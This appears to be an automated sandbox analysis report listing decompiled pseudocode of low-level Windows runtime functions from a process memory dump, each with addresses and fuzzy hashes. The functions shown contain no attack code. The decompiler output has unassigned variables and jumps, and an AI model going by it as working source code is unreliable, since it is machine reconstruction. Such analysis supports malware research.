                                                                                        			E012514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x128d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E011DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E011B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                        0x012514fb
                                                                                        0x012514fb
                                                                                        0x0125150a
                                                                                        0x01251514
                                                                                        0x01251519
                                                                                        0x0125151b
                                                                                        0x01251526
                                                                                        0x0125152c
                                                                                        0x01251534
                                                                                        0x01251537
                                                                                        0x0125153a
                                                                                        0x01251545
                                                                                        0x01251557
                                                                                        0x01251547
                                                                                        0x01251550
                                                                                        0x01251550
                                                                                        0x01251562
                                                                                        0x01251563
                                                                                        0x01251565
                                                                                        0x0125156a
                                                                                        0x0125157f

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d1ea846191bcb4a61e0db3ffbdc1cc91b7d479b370948e8b4c9ef336948c393a
                                                                                        • Instruction ID: 58a42c1f3b70bdb987c6be73910d6a21f0a3a4ac726567fb00cbac8aa29de048
                                                                                        • Opcode Fuzzy Hash: d1ea846191bcb4a61e0db3ffbdc1cc91b7d479b370948e8b4c9ef336948c393a
                                                                                        • Instruction Fuzzy Hash: 4E019271A0125DAFCB14DFA8D845FAEBBB8EF45704F044056F905EB280D674DE01CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011958EC Relevance: .0, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 91%
                                                                                        			E011958EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x128d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1175c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01195943() != 0 &&  *0x1285320 > 5) {
					E01217B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01217B5E( &_v28, _t28);
					_t11 = E01217B9C(0x1285320, 0x117bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E011DB640(_t11, _t17, _v8 ^ _t29, 0x117bf15, _t27, _t28);
			}















                                                                                        0x011958fb
                                                                                        0x011958fe
                                                                                        0x01195906
                                                                                        0x0119590a
                                                                                        0x0119593c
                                                                                        0x0119593c
                                                                                        0x0119590c
                                                                                        0x0119590c
                                                                                        0x01195911
                                                                                        0x00000000
                                                                                        0x01195913
                                                                                        0x01195913
                                                                                        0x01195913
                                                                                        0x01195911
                                                                                        0x0119591d
                                                                                        0x011f1035
                                                                                        0x011f103c
                                                                                        0x011f103f
                                                                                        0x011f1056
                                                                                        0x011f1056
                                                                                        0x0119593b

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1cd3cb9254aa2491a5f225de3bac9da2198e3a11ed12a4997d10f15f744eea25
                                                                                        • Instruction ID: f23e6f4657614e0ca3d34ef7cfb3c0cd35d8e617609652a6f3b9340616b5aee3
                                                                                        • Opcode Fuzzy Hash: 1cd3cb9254aa2491a5f225de3bac9da2198e3a11ed12a4997d10f15f744eea25
                                                                                        • Instruction Fuzzy Hash: B801DF31A101099BEB1CEF28D8009BE7BBAFB96220F45406A9A15A7284EF30DE018695
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011AB02A Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011AB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E011B7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01217016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                        0x011ab037
                                                                                        0x011ab039
                                                                                        0x011ab03b
                                                                                        0x011ab040
                                                                                        0x011fa60e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011fa61d
                                                                                        0x011ab04b
                                                                                        0x011ab04e
                                                                                        0x011fa627
                                                                                        0x011fa634
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011fa641
                                                                                        0x011fa653
                                                                                        0x011fa643
                                                                                        0x011fa64c
                                                                                        0x011fa64c
                                                                                        0x011fa65b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011fa66c
                                                                                        0x011ab057
                                                                                        0x011ab057
                                                                                        0x011ab057
                                                                                        0x011ab046
                                                                                        0x011ab046
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                        • Instruction ID: 6a8b4c4f39eea1290ea90fadc92b905611bd52e77bb864dc0b2156aaa849dbbc
                                                                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                        • Instruction Fuzzy Hash: 1C0184322445C09FE32AC71CD984F767BE8EF85750F0940A5FA19CB691D72CDC40C625
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01261074 Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E01261074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0126165E(__ebx, 0x1288ae4, (__edx -  *0x1288b04 >> 0x14) + (__edx -  *0x1288b04 >> 0x14), __edi, __ecx, (__edx -  *0x1288b04 >> 0x14) + (__edx -  *0x1288b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0125AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E011B7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0124FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                        0x01261074
                                                                                        0x01261080
                                                                                        0x01261082
                                                                                        0x0126108a
                                                                                        0x0126108f
                                                                                        0x01261093
                                                                                        0x012610ab
                                                                                        0x012610ab
                                                                                        0x012610c3
                                                                                        0x012610cf
                                                                                        0x012610e1
                                                                                        0x012610d1
                                                                                        0x012610da
                                                                                        0x012610da
                                                                                        0x012610e9
                                                                                        0x012610f5
                                                                                        0x012610f5
                                                                                        0x012610fe

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ee7c14cb0707a350d584cfcb78bda97fe114c375b0436017da359a1e91f6896
                                                                                        • Instruction ID: c73734907b241bc53a6eeedb8163b51e72830dbc6bc902defa9db58a8f6f1986
                                                                                        • Opcode Fuzzy Hash: 9ee7c14cb0707a350d584cfcb78bda97fe114c375b0436017da359a1e91f6896
                                                                                        • Instruction Fuzzy Hash: 6A014C726247429FC710EF28C944B1A7BE9BBC4310F048619FE85832D0EE71E890CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0124FE3F Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 59%
                                                                                        			E0124FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x128d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E011DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E011B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                        0x0124fe3f
                                                                                        0x0124fe3f
                                                                                        0x0124fe4e
                                                                                        0x0124fe58
                                                                                        0x0124fe5d
                                                                                        0x0124fe5f
                                                                                        0x0124fe6a
                                                                                        0x0124fe72
                                                                                        0x0124fe75
                                                                                        0x0124fe78
                                                                                        0x0124fe83
                                                                                        0x0124fe95
                                                                                        0x0124fe85
                                                                                        0x0124fe8e
                                                                                        0x0124fe8e
                                                                                        0x0124fea0
                                                                                        0x0124fea1
                                                                                        0x0124fea3
                                                                                        0x0124fea8
                                                                                        0x0124febd

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 039440b07640f24de7f775e5ccb699ae47c4b39d2efae3fdb4906689654d4568
                                                                                        • Instruction ID: 1bf42080623e68e017c06b5cd396505a3ff456955a19e4c88d990ea51b58b880
                                                                                        • Opcode Fuzzy Hash: 039440b07640f24de7f775e5ccb699ae47c4b39d2efae3fdb4906689654d4568
                                                                                        • Instruction Fuzzy Hash: B7018471E1521DABDB18DFA9D845FAEBBB8EF84704F004066F901AB281DA749A01C795
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0124FEC0 Relevance: .0, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 59%
                                                                                        			E0124FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x128d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E011DFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E011B7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                        0x0124fec0
                                                                                        0x0124fec0
                                                                                        0x0124fecf
                                                                                        0x0124fed9
                                                                                        0x0124fede
                                                                                        0x0124fee0
                                                                                        0x0124feeb
                                                                                        0x0124fef3
                                                                                        0x0124fef6
                                                                                        0x0124fef9
                                                                                        0x0124ff04
                                                                                        0x0124ff16
                                                                                        0x0124ff06
                                                                                        0x0124ff0f
                                                                                        0x0124ff0f
                                                                                        0x0124ff21
                                                                                        0x0124ff22
                                                                                        0x0124ff24
                                                                                        0x0124ff29
                                                                                        0x0124ff3e

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aa247bbd5db4d9490bc206e8741f1b1938f11b7c5ca670a7c1fc841cf2536ef4
                                                                                        • Instruction ID: d1da3726429d6febcbff08cab7ed08d7aae93d593d4f53f5b67d7292714a47e8
                                                                                        • Opcode Fuzzy Hash: aa247bbd5db4d9490bc206e8741f1b1938f11b7c5ca670a7c1fc841cf2536ef4
                                                                                        • Instruction Fuzzy Hash: 6501D471A1021DABCB18DBA8D945FAEBBB8EF85704F004066F901AB280DA709A01C795
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01268A62 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 54%
                                                                                        			E01268A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x128d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E011B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E011DB640(E011D9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                        0x01268a62
                                                                                        0x01268a71
                                                                                        0x01268a79
                                                                                        0x01268a82
                                                                                        0x01268a85
                                                                                        0x01268a89
                                                                                        0x01268a8c
                                                                                        0x01268a8f
                                                                                        0x01268a92
                                                                                        0x01268a95
                                                                                        0x01268a9f
                                                                                        0x01268ab1
                                                                                        0x01268aa1
                                                                                        0x01268aaa
                                                                                        0x01268aaa
                                                                                        0x01268abc
                                                                                        0x01268abd
                                                                                        0x01268abf
                                                                                        0x01268ac4
                                                                                        0x01268ada

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 29c34bac466b039531c9166bd0e72c0c9819728720979af2d22a741101a94543
                                                                                        • Instruction ID: a0881808c4428c26af1ed238e6f8e1b19b7aa3de83d486be0d3b72d416cf453c
                                                                                        • Opcode Fuzzy Hash: 29c34bac466b039531c9166bd0e72c0c9819728720979af2d22a741101a94543
                                                                                        • Instruction Fuzzy Hash: D1012C71A1121DAFCB04DFA9D9419EEBBB8EF58314F10405AFA05E7381D734AD00CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01268ED6 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 54%
                                                                                        			E01268ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x128d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E011B7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                        0x01268ed6
                                                                                        0x01268ee5
                                                                                        0x01268eed
                                                                                        0x01268ef0
                                                                                        0x01268efa
                                                                                        0x01268f03
                                                                                        0x01268f0c
                                                                                        0x01268f15
                                                                                        0x01268f24
                                                                                        0x01268f27
                                                                                        0x01268f31
                                                                                        0x01268f43
                                                                                        0x01268f33
                                                                                        0x01268f3c
                                                                                        0x01268f3c
                                                                                        0x01268f4e
                                                                                        0x01268f4f
                                                                                        0x01268f51
                                                                                        0x01268f56
                                                                                        0x01268f69

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1698e8ff24c62a2913c4f34e876fa4e7958b2146e05c35f666fcfb6108845e74
                                                                                        • Instruction ID: fd1306bc1e98bf16cee84cbc053f55b2f73f9a61d5a80a2e0ab2f4cf8afa2357
                                                                                        • Opcode Fuzzy Hash: 1698e8ff24c62a2913c4f34e876fa4e7958b2146e05c35f666fcfb6108845e74
                                                                                        • Instruction Fuzzy Hash: BB111E71A1421A9FDB04DFA8D441BAEBBF4FF08304F0442AAE519EB382E7349940CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119DB60 Relevance: .0, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0119DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0119DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0119E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0119E8B0(__ecx, _t14, 0xfff);
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                        0x0119db64
                                                                                        0x0119db66
                                                                                        0x0119db6b
                                                                                        0x0119dbaa
                                                                                        0x0119db71
                                                                                        0x0119db76
                                                                                        0x0119db7a
                                                                                        0x0119dba3
                                                                                        0x0119db7c
                                                                                        0x0119db87
                                                                                        0x0119db8b
                                                                                        0x011f4fa1
                                                                                        0x011f4fb3
                                                                                        0x011f4fb8
                                                                                        0x0119db91
                                                                                        0x0119db96
                                                                                        0x0119db98
                                                                                        0x0119db98
                                                                                        0x0119db8b
                                                                                        0x0119db7a
                                                                                        0x0119db9d
                                                                                        0x0119dba2

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                        • Instruction ID: a0f831b9bc8920c8571d9e378c52b882df35cdd14e93b0d186a944d775f0c5ac
                                                                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                        • Instruction Fuzzy Hash: 6EF0FC332015239BDF3E6AD998D4F6BB6958FD3A64F160035F2169B344CB608C0286D2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119B1E1 Relevance: .0, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0119B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E011B7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E011B7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01217016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                        0x0119b1e8
                                                                                        0x0119b1ea
                                                                                        0x0119b1f3
                                                                                        0x011f4a17
                                                                                        0x0119b1f9
                                                                                        0x0119b1f9
                                                                                        0x0119b1f9
                                                                                        0x0119b201
                                                                                        0x011f4a21
                                                                                        0x011f4a2e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f4a3b
                                                                                        0x011f4a4d
                                                                                        0x011f4a3d
                                                                                        0x011f4a46
                                                                                        0x011f4a46
                                                                                        0x011f4a55
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0119b20a
                                                                                        0x0119b20a
                                                                                        0x0119b20a
                                                                                        0x0119b20a

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                        • Instruction ID: 4f91a47a40d3c71fcaf0a866d15e6d2706bb23794ef05bf89d3574fd6326519a
                                                                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                        • Instruction Fuzzy Hash: A501F4322046809BD72E975DD844F6A7BD9EF91754F0900A5FA258BAB2D778D800C319
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0122FE87 Relevance: .0, Instructions: 38COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 46%
                                                                                        			E0122FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x128d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E011B7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                        0x0122fe96
                                                                                        0x0122fe9e
                                                                                        0x0122fea1
                                                                                        0x0122fead
                                                                                        0x0122feb3
